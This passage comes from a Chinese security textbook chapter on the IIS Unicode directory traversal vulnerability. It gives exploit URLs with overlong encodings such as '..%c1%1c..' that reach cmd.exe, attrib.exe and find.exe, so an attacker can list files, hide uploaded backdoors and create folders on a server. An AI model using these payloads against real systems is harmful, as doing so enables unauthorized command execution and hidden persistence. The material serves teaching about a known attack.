如果要显示d盘Inetpub\scripts\wwwroot下的相同文件类型,可在浏览器的地址栏中输入如下内容:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.ht*
如图6-71所示。
图6-71 显示d盘Inetpub\scripts\wwwroot下的相同文件类型
显示或更改文件属性的命令。该命令显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。入侵者有时会上传一些后门程序,并用该命令将其隐藏起来。具体参数如表6-1所示。
表6-1 attrib参数
|
命 令 参 数 |
说 明 |
|
%2br |
设置只读文件属性 |
|
-r |
清除只读文件属性 |
|
%2ba |
设置存档文件属性 |
|
-a |
清除存档文件属性 |
|
%2bs |
将文件设置为系统文件 |
|
-s |
清除系统文件属性 |
|
%2bh |
将文件设置为隐藏文件 |
|
-h |
清除隐藏文件属性 |
这里的%2b相当于DOS下的+b,例如要查看d盘Inetpub\scripts\wwwroot下的index.htm的属性,可在浏览器的地址栏中输入如下内容:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm
或者:
http://127.0.0.1/scripts/..%c0%2f../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm
如图6-72所示。
图6-72 查看index.htm的属性
可以从图6-72看出index.htm文件属于只读、隐藏、存档。
创建目录或子目录。如果要向d盘下建立一个名为file的文件夹,可在浏览器的地址栏中输入如下内容:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md d:\file
或者:
http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+md d:\file
如图6-73和6-74所示。
图6-73 使用md命令建立文件夹
图6-74 利用UNICODE漏洞建立文件夹file
遇到空格用%20代替,遇到长度超过8个字母的文件或是Program Files这一类文件时,将使用以下格式:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\progra~1
或者:
http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\progra~1
如图6-75所示。
图6-75 查看Program Files文件夹
回显命令。在DOS模式下输入echo/?,如图6-76所示。
图6-76 echo命令
echo回显命令在系统默认下是打开的,如果输入参数off则关闭回显命令。在echo命令后面跟上一个字符,则该字符被回显,如图6-77所示。
图6-77 echo命令的使用
管道工具>、>>的功能是将命令产生的输出重新定向,例如,写到某个文件或输出到打印机中。>>产生的内容将追加进文件中,>则将原文件内容覆盖。在D盘下将dir命令列出的目录,输出到D盘文件ffhh.txt中,如图6-78和图6-79所示。
这时系统的D盘下会有个名为ffhh.txt的文件,打开后显示着D盘下用dir列出的目录,如图6-81所示。
图6-78 将D盘目录输出到ffhh.txt中 图6-79 通过管道命令将D盘目录写入记事本
还有很多命令可以使用,如删除目录的rd命令、复制文件和目录的xcopy命令、文件夹剪贴命令move等。
6.9.2小节介绍一个入侵者是如果利用UNICODE漏洞对网站进行攻击的。